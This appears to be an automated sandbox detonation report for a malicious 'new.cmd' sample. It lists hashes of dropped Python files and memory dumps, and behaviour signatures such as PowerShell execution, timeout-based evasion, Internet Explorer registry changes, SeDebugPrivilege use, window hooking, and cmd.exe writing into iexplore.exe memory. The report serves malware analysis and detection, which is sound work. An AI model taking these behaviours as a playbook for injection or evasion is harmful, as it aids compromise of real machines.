MD5 b8057c657205e3fad34b757cffbc705a
SHA1 b850217708595c7fb96e478e967ac3977f6e620a
SHA256 3278de7883a6e40a1ff99ce6168100d0bc271dcb8936e8514712d7a9744615de
SHA512 7d49012891bd6193687b829c75e92f7e960d55d95bd3e7a5d88f99d4c9e9de6830fff208b615fe49ff51939fc45fa0ac50003ba3f80b0e00de0285ace9eebf0e

C:\Users\Admin\Downloads\Python\Python312\Lib\re\_compiler.py

MD5 aa86cb1709b99d49518abfa530d307d3
SHA1 e2ac0d860370beec9e027c6883f06855e32910fc
SHA256 7151ee39cffc73db023430de5d6d8f13bc8244255c831d5c2934fccc991ca5e0
SHA512 265d4cd3a695d0c81645aa80a6f0aabe827cb5413f3aa6946f8407d6eec3a1ffd57bc926fa478b8c60a8eb6d689852c0da8a197821c1c4514abbb303c5f770b1

C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\reprlib.cpython-312.pyc

MD5 7be37e702cfe628d2ff7ee74cef7b3ad
SHA1 e21ce6657e561806c8e1155486b97ae3bbeba3fb
SHA256 6924a3b72dea632fb8fce937e42259894262b13aa3f044c825c95cf942ee35aa
SHA512 bb0d7162fd65f640193b2c5164cb2e3c81a196c885b6a448cf8d3e0ce6769c1e052ad7bde89dec89c9c1ce0998535dbeebca321749f293f4a37e8a6c3c9603d3

C:\Users\Admin\Downloads\Python\Python312\Lib\reprlib.py

MD5 dfda46ef7019ab30afa5183cf035263d
SHA1 b7cece019304f0c6836c148f85dd3c920c5cd654
SHA256 354fd4471a2d8c5972e67a38a8eb40040f12bd9b6acd260a889efed250770f0b
SHA512 62b6da4124537fe2e891aafe5e7c901368c6f498f5d0de83d524fa2653f9aec731bc8151790fcfe36900b65ff36bb0165142f074977e8b2c808bf0507257adb9

C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\keyword.cpython-312.pyc

MD5 f54b9393d80136be78dcddae5e1d2aef
SHA1 2ae1577de2c4c448bb8b6c20e4a56268720d175e
SHA256 59dc1abb094e9a7cf5277a32ad4e0a285a6530713915627e1a2866f5847359de
SHA512 813e471182247c2f0c5e2f1cc49130d510fdce2eac3e214a2c63f3fba9f5f21a67f5b669997129cfa25e09465ae9e0b62bfe5da3100a87f95ad2701c6869b132

C:\Users\Admin\Downloads\Python\Python312\Lib\keyword.py

MD5 a10df1136c08a480ef1d2b39a1f48e4a
SHA1 fc32a1ff5da1db4755ecfae82aa23def659beb13
SHA256 1f28f509383273238ad86eda04a96343fa0dc10eeaf3189439959d75cdac0a0b
SHA512 603f6dc4556cbbd283cf77233727e269c73c6e1b528084e6c6234aefd538313b4acc67ca70a7db03e015a30f817fcfedda2b73de480963ae0eefd486f87463cd

C:\Users\Admin\Downloads\Python\Python312\Lib\collections\__pycache__\__init__.cpython-312.pyc

MD5 5ded9aebc5bb1b2b7d27443e6e0a9437
SHA1 32c060890716c8aced35c92e2e7ba23199a2fd7a
SHA256 8589a1421368d7b06c7ff575007d85b5cade092062f814b7aa4873c2beade5bc
SHA512 7509ef1cfc98629fb5916a2913225098d4a84ecd7bb2cac13df80486dc11b478d1e605b1e2bf3b9df89364049de1289269b48b389313937786be985088700af5

C:\Users\Admin\Downloads\Python\Python312\Lib\collections\__init__.py

MD5 251382c3e093c311a3e83651cbdbcc11
SHA1 28a9de0e827b37280c44684f59fd3fcc54e3eabd
SHA256 1eb4c4445883fd706016aca377d9e5c378bac0412d7c9b20f71cae695d6bb656
SHA512 010b171f3dd0aa676261a3432fe392568f364fe43c6cb4615b641994eb2faf48caabf3080edf3c00a1a65fc43748caaf692a3c7d1311b6c90825ffce185162b0

C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\functools.cpython-312.pyc

MD5 a8cf4f3f701751740dac394fc396aec7
SHA1 73c5cc6c6d08080e788337494b2c39b9703423b6
SHA256 3334f1b6609e60a7c5b4d5630654de245ff9a5c8a7072671a850b4a2056319e9
SHA512 84e64b35e08e73dffc66d490c52f199fc10f13fab4aab5fd65cb0a1539f555bee6e3524fd353a468a637db165421a6854954e14674dbee12625a6300e092a323

C:\Users\Admin\Downloads\Python\Python312\Lib\functools.py

MD5 3638d2608c42e3a3bf3b2b1c51b765f4
SHA1 be947a9b8301bbedf2406416ac908963279b46cd
SHA256 bd6f192c31c5e266ad9eec9f550b8bc485f90d583764ff81aa3f36d1209f005e
SHA512 14b60f0b5119b90fcd4db3b0aeb48ec4ca9775910470178796ba54c0d16f8887b9a3d283f925af779a1cc6bc99d25f016cccbf2bb72d4a9099bb821a54a2b418

C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\operator.cpython-312.pyc

MD5 9439ffb1d4bbb5cc97e565e7431c4faf
SHA1 c929fec735d8281ef0e31961b2aae75a8de84b12
SHA256 7b691b1b0892c1ac26351847b8e4740cf395e0ef78900efc6d37290f68811691
SHA512 38844f9c8953641d1145d194d4f2700fa74865d6b6a1da5b5174081c610486266cd7cda770d0d366a5fa0186c55bbddb2cab399b9e921196579759a0b58f9ffb

C:\Users\Admin\Downloads\Python\Python312\Lib\operator.py

MD5 dc7484406cad1bf2dc4670f25a22e5b4
SHA1 189cd94b6fdca83aa16d24787af1083488f83db2
SHA256 c57b6816cfddfa6e4a126583fca0a2563234018daec2cfb9b5142d855546955c
SHA512 ac55baced6c9eb24bc5ecbc9eff766688b67550e46645df176f6c8a6f3f319476a59ab6fc8357833863895a4ef7f3f99a8dfe0c928e382580dfff0c28ca0d808

C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\enum.cpython-312.pyc

MD5 bb08f420f5dfd2344aa42e77cd36669c
SHA1 5e6f66233b1a85bfb8fa1812b8f3b1f63e68151c
SHA256 23440df45b19d66e0d6177162bb06eb02415cdb8b7ff3acc5bf8b17fd463b1f1
SHA512 c2811310838e4ba03211117bb06e8434633365959f9e29888450fcaff1d9de0349b65d91f7e3a6603ce9bcaf79e88f5b48e5c557575fda61e4569c8953c9c34a

C:\Users\Admin\Downloads\Python\Python312\Lib\re\__init__.py

MD5 02f3e3eb14f899eb53a5955e370c839f
SHA1 e5c3ab0720b80a201f86500ccdc61811ab34c741
SHA256 778cdca1fe51cddb7671d7a158c6bdecee1b7967e9f4a0ddf41cfb5320568c42
SHA512 839fde2bfd5650009621752ccbceea22de8954bf7327c72941d5224dc2f495da0d1c39ba4920da6314efd1800be2dab94ac4ce29f34dc7d2705fcb6d5ab7b825

C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\base64.cpython-312.pyc

MD5 6a425637cb61c65ae8cfe0d83e6e3b77
SHA1 d7615d5216ab6d69fbff349bf7e12fe5aa45c741
SHA256 575e9d22cf5e94a7c15044c45bd8f7c03fce5b8b92336651d57ea5e20da188f4
SHA512 84ca7a4f05bc5fbef41fde057dc10a6cc252c4a371b28657085766638a04beacff22c2ac1588d7b077cac6eebe5bfc7c8aadf4ce4f8468282c2a336f7b8d3e27

C:\Users\Admin\Downloads\Python\Python312\Lib\base64.py

MD5 231ae490d92466b1573e541649772154
SHA1 4e47769f5a3239f17af2ce1d9a93c411c195a932
SHA256 9e685425290c771df1a277b5c7787ad5d4cf0312f2c4b042ce44756df6a3d112
SHA512 7084b49f0788bfbe035bc2fe42db7a63b21ebc99f63c03f80dec5569067c1e63312d8c5a754f2d72d7c9bb51fa23ca479fcba78682610eb2b68870cbeae1bea3

C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\__pycache__\_endian.cpython-312.pyc

MD5 0fda9dc9c51560c5455ddc99b95dcfe8
SHA1 46794653086d98b8d64eee575e7a04689beea63a
SHA256 4bed1c75e896df05229e609fd827d94a5382e92b158595141b487a70600d5c35
SHA512 7c110f406deafad91d00468d23c38cc0e76a189ded1e8d9491dc3692fbeb5887cad20ee10a0a97b989fdd67529b2fb8b5ad4e183d535dab1d0f1f254503c83c7

C:\Users\Admin\Downloads\Python\Python312\Lib\ctypes\_endian.py

MD5 7daa213263c75057cf125267b7fdfbd3
SHA1 efb9403d8e3f09734f6b2ba3889b274997d0a039
SHA256 8c5b9ac7306dcf98856c9b815a5fc604ba0f47acab15ac47ad858499c6981579
SHA512 1e00f043ab8f3f77a81c8c6ea6760625bcdf2eccbef6432266f75e89f28778b48bd2709dbcf9d70a4a4e1384629aed31c7fdacdf4723fe18f36b6d9366b03921

C:\Users\Admin\Downloads\Python\Python312\Lib\__pycache__\struct.cpython-312.pyc

MD5 29ae69bad548bcb4adc79ed4bd7f073d
SHA1 4ce183af84f7cb3c428ef87d97c03c871417026d
SHA256 038ef897ce5864486e09285946d54c459421b7d10253565c1e2a13857d78b6a9
SHA512 fb90f1ddddadd634af51d8af4d0cd0a8b5011c754d068410bc723c3f6a442f8bdf8105d69f4f77539c5ffb8c446ece7dbcd84a2f40483d3b7f54fe4e76fb3e08

C:\Users\Admin\Downloads\Python\Python312\Lib\struct.py

MD5 5b6fab07ba094054e76c7926315c12db
SHA1 74c5b714160559e571a11ea74feb520b38231bc9
SHA256 eadbcc540c3b6496e52449e712eca3694e31e1d935af0f1e26cff0e3cc370945
SHA512 2846e8c449479b1c64d39117019609e5a6ea8030220cac7b5ec6b4090c9aa7156ed5fcd5e54d7175a461cd0d58ba1655757049b0bce404800ba70a2f1e12f78c

memory/5072-11500-0x000001F2F89A0000-0x000001F2F89B6000-memory.dmp

C:\Users\Admin\Downloads\Python\Python312\kam.py

MD5 a1dd8190107355b7df914b49d135a475
SHA1 4b35ca7b9c797fa6869e4abb4c695a43949e0bba
SHA256 93501b7fc44acef66c982dd7b0110a570a0ca5bf6caf34ac71f123948be4442b
SHA512 18fb61cd938b5e494d81b15fb4e1c89268edfc2c45043b37bc1157e6004341552117f7850bf1cd08878451aa5b0c9610c272c16a7a383378250060dcd6ace257

memory/5072-11511-0x000001F2FA4D0000-0x000001F2FA4E6000-memory.dmp

memory/4076-11514-0x000002304A450000-0x000002304A45F000-memory.dmp

memory/4076-11519-0x000002304BF60000-0x000002304BF6E000-memory.dmp

memory/2712-11529-0x0000021D1E8A0000-0x0000021D1E8AF000-memory.dmp

memory/2712-11535-0x0000021D203D0000-0x0000021D203DE000-memory.dmp

memory/1544-11539-0x000001C2542F0000-0x000001C254302000-memory.dmp

memory/1544-11546-0x000001C254670000-0x000001C254682000-memory.dmp

memory/4832-11548-0x0000014E611F0000-0x0000014E611FF000-memory.dmp

memory/4832-11554-0x0000014E62D00000-0x0000014E62D0E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 2733480d152a88eb1a34498efe28a0bf
SHA1 2be4aa136da80e4b0450eaa658411245bf32477d
SHA256 c32909e7e8b9a13d80eadcf140552236598913d504acc4760737ae2a8c08f5f8
SHA512 cbfceefd23ad6983788a7bb594fa50158e44301f0d9baf67a5b0bc57585d3e3ed131247487ab97b3731b6a7e26eebe067d97540f47891006544655417ea73171

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 be135f6ab187314f0176e160c23b1a13
SHA1 9d8bdaa7ca130e3bc35b016497c52bc7624de1d0
SHA256 93333d07214a4a26e9ae426ca4eec3c718735c7e6cb95b88f4f798106221637b
SHA512 5ea2374981899f568ef41a8922460c52daa7e2134faaa14a55a194c3fc399f89af5a1506febd6d5085adae4464ff8d8c865f627f5fddf4c301f4cd2e62b6b93c

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 c4b631489762b566474803360db43395
SHA1 9c796d530ca4c13663ac7583347c1921b6dd6c14
SHA256 102e522ebfc9eacd702b351f7c5498f822fc403cd3adedcfe9b499f87869c8c7
SHA512 4c8f935c81dea39ef550f8e9d6d335439cbb9e0de9e2630a95ae0a1205cff1dbc13338a7bd7e5259871b1a9bfc15ea5cb2368586e428a1b8a58e3095e316714f

memory/3800-11864-0x0000000004B20000-0x0000000004B56000-memory.dmp

memory/3800-11865-0x0000000007670000-0x0000000007C98000-memory.dmp

memory/3800-11868-0x0000000007560000-0x0000000007582000-memory.dmp

memory/520-11870-0x00000000080D0000-0x0000000008136000-memory.dmp

memory/520-11869-0x0000000008060000-0x00000000080C6000-memory.dmp

memory/3800-11871-0x0000000007E80000-0x00000000081D0000-memory.dmp

memory/3800-11874-0x00000000081F0000-0x000000000820C000-memory.dmp

memory/3800-11875-0x0000000008840000-0x000000000888B000-memory.dmp

memory/3800-11876-0x0000000008570000-0x00000000085E6000-memory.dmp

memory/3800-11907-0x0000000009490000-0x00000000094AA000-memory.dmp

memory/3800-11906-0x0000000009D40000-0x000000000A3B8000-memory.dmp

memory/520-11925-0x0000000009B80000-0x0000000009BA2000-memory.dmp

memory/520-11924-0x0000000009C20000-0x0000000009CB4000-memory.dmp

memory/520-11928-0x000000000ACB0000-0x000000000B1AE000-memory.dmp

memory/520-11984-0x000000000B1B0000-0x000000000EAC0000-memory.dmp

memory/3800-12160-0x000000000ADC0000-0x000000000C099000-memory.dmp

memory/5156-12336-0x000000000AF40000-0x000000000FC79000-memory.dmp

memory/5432-67115-0x000000000A740000-0x000000000CC0E000-memory.dmp

memory/41352-823326-0x0000000003400000-0x0000000003416000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-23 18:31

Reported

2024-05-23 19:04

Platform

win7-20240221-en

Max time kernel

1800s

Max time network

1565s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\new.cmd"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b0f756db815c654b9a16fa973a25a40700000000020000000000106600000001000020000000e490a3f0df8f0f3935cb84d575c32a4e5408ac6a1314c7527d02548e6cd282ba000000000e8000000002000020000000de2194244262607ad8d2bca26f5cf0503bcf0f0bfc0759ded57145410232faba300200003064c6f6c5e4ae048898f729f53e9336711e2e6a96d848d23fba3edb39c8a5e24d38fb8f63c9324ecd2ca64d30b859ca4bb8943ba2b799ab0f9eaa9e04335d6a68b1b9669f8fc99b255cecd11912eeea5b06145145f553c90e65c6282a12e1ba98c8e6636e7dc03c290dd8ab8d521f73955b8ccad91c7da0992a08a078b51caaf702c165b6c8a17fc29a513d9fd8cb1d15e14b4b3138f27a7d1b348339fd6625b52cad42023de529f9f1fdc74ddc641ca5e0872ac16e6bba69daf239e401661d913c907759dfc6437c6b6c93311b9d62c12b06e009a027a1dd4a4230d1376c81021d91a0ab7fd26497e02098ad9c602a4fedd4d1865ac643ee953a155f272271019539c0de9dfe7e18b3371d9bbcf19bc080894e2fe4b42f335d1f342f730c5ff0a444b1f07a98381a6f7c80d2875c0447715fa19406cd4446cc2be67b10e3f1f5f9ed25d5dc7354f5a201bcf7b0aa1628ee028b009158e1eec76bae1fd1ee645a8b13a20667ff71de81e2656aaeea594ae753e5337afd3fc44b7477be4e0f23534d70f30ce9ab6a5e2ad62958252cf7472048c819f0e9813e15f85442822f4060dd2f6611d90ea9c90f7777af35bfe0ad36a71491c88b3d9818d5079ab10954cea8d405f5ff58945ae663976d48efed939eb413a70080bb47b2ac516b953b9a01835d00bfad726a2f68c9c74537cbd97100288f7e511d1df4ac14e71bf544e8a9bd221a7a023eb2e87072e107a8bc3bb45d9b552aa8d68b264b13ba951c77cecd564477032ae78b96ddda1e368a18e740000000da401fd633758e134ec9ddcd258492359b5a70e1cc49d41abd01008ae15812bebdd1108ee6c61ef5acac534fd1714e2c20f9004fd322737d3db77d455cbd4c74 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{272C9391-1933-11EF-AFF6-E61A8C993A67} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70a179ec3fadda01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "422651167" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b0f756db815c654b9a16fa973a25a407000000000200000000001066000000010000200000004c7dcb760514d3fd45fde93e196b725a6ac04b963af9975a87ffc23ab91522cd000000000e80000000020000200000006e768afae8c67000fd2736d5fa086e3f399ef2857f561f39c51116b0bde289d420000000bc49d429e494057f2df230b8a200540a23cdc9b7bb9bccb65a1868e550a19c93400000006ee50ad1f9a7cc1a8d0f145edd3a6a0961aeddbe8c1f731036cdb2d0c87b637bf8eb0edbd81dd249943e16697d3c484d01fac6094759b50822ae6088e0e315ea C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000b0f756db815c654b9a16fa973a25a4070000000002000000000010660000000100002000000034d8b3f5e7ae2e907b838736cd584a45f84f438e27e7f1ccb442cf4f8c9602a9000000000e8000000002000020000000025f301a04fdffdceeb7091460e10adca586621380103631bbd98d58b8c2c0d83002000065a967015b90f75ed08d46fd9d6dbe8369aa8a2453fa350a7905dbc8a429b2312cf4deeb4ad81e6170dce09e170d87a0807ff8c1ac6a754ff0535b8a4f13f0fe4a90ddc07c52b296ca434d33767f2aa60cdf6ad73a4e86227b75047d48bd29c9a8d103e40c7a078c9e4de4891c6381dbf915703698f149feef38bfb6546da832c4d695055f774d7684b5b9dcaafef58b86a5b716beab614d514348238e78b198bb1aafa0bdf4a21de4e2b1ec86f1d89ee7708fe84fdf47cbbe71bfbc4b92ce857068062d92e9d6d4a311b507a28f7ac5259dd67205b32a25d307ba80b0e50634f2ba647e40591586c2f8250b5d669d68d18ba4fc2061cb4ed86b56e3fa2e3768ca9fb44a127844c5a621143987699b065822f878a56be9676e60e4042630e5a2559fbd80689bbf0f0b54071153c812f4c5938017a8f32018d92a2cd065cfc38b92a605101aa81d18fd9d884ee92f703d85198a7cffaeda73e9f2f8e741016804bf43e4bf9ff7702357d89b6ab6480f70fcc0d2d8d4bd973fb306257e1ada6c3b0999a7638e69b294abc6b0ef607f8aece65cc699e8af3dc52129f69be58fbafce5adbb83ebac36928d538cca457c3deb9984ec1e6af87d166ef91fa9d3e3dd6a3687f106b87d6f17985369a0e98dd2a4171192d9c1f7917452043d3dd52df929d2694216cdf85d58ed2e1908afb59515ed598f3c1d780218f3ce633541b1d451aaefc4cff7c5bea3064dd55e196ac62e5d400b27207aca8704d4f0ad2957842c5e65ed986e0c0e66bad9e996eef1a7124000000051ed4752752684309c6e05480f3d92238385233f91b3debfb9a9dc01ccee8f2529cf2b7ff1aa62e05d5e81fe4fbe0ccaec3409b61e4212e041792abb7db67d19 C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2312 wrote to memory of 2500 N/A C:\Windows\system32\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
